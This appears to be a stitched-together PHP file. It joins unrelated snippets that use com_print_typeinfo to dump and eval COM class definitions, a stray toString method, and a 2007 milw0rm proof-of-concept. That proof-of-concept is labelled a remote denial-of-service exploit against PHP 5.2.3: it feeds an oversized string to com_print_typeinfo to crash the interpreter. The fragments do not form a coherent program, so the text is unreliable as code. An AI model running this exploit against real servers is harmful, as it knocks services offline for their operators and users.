function dumpAPI($classes, $ovals, $cvals)
{
ob_start();
foreach ($classes as $classname => $obj) {
// dumps a whole class declaration
com_print_typeinfo($obj);
}
$typeinfo = ob_get_contents();
ob_end_clean();
// evaluate all dumped classes
eval($typeinfo);
$properties = array();
foreach ($classes as $classname => $obj) {
$value = 1;
if (!empty($cvals[$classname])) {
// class overwites - when all properties of an object
// are of the same class, e.g. Timings
$value = $cvals[$classname];
}
$props = array_fill_keys(array_keys(get_class_vars($classname)), $value);
// object overwrites, e.g. CacheAfter is of class CacheInfo
foreach ($ovals as $key => $overwrite) {
if (isset($props[$key])) {
$props[$key] = $overwrite;
}
}
// property is another object of known class
// e.g. Request => Request
foreach ($classes as $clname => $oo) {
if (isset($props[$clname])) {
$props[$clname] = $clname;
}
}
$properties[$classname] = $props;
}
return $properties;
}
/**
* Creates a string representation of this object
*
* @return string
*/
public function toString()
{
ob_start();
com_print_typeinfo($this->h);
preg_match('/class ([^ ]+) \\{ \\/\\* GUID=([^ ]+) \\*\\//', ob_get_contents(), $matches);
ob_end_clean();
return $this->getClassName() . '(->' . get_class($this->h) . '<' . $matches[1] . '>@' . $matches[2] . ')';
}
<?php
//PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//Tested on xp sp2, worked both from the cli and on apache
//Bug discovered with "Footzo" (thanks to rgod).
//
//To download Footzo:
//original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar
//alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar
if (!extension_loaded("bz2")) {
die("you need bz2 extension loaded!");
}
$buff = str_repeat("a", 1000);
com_print_typeinfo($buff);
?>
# milw0rm.com [2007-07-12]
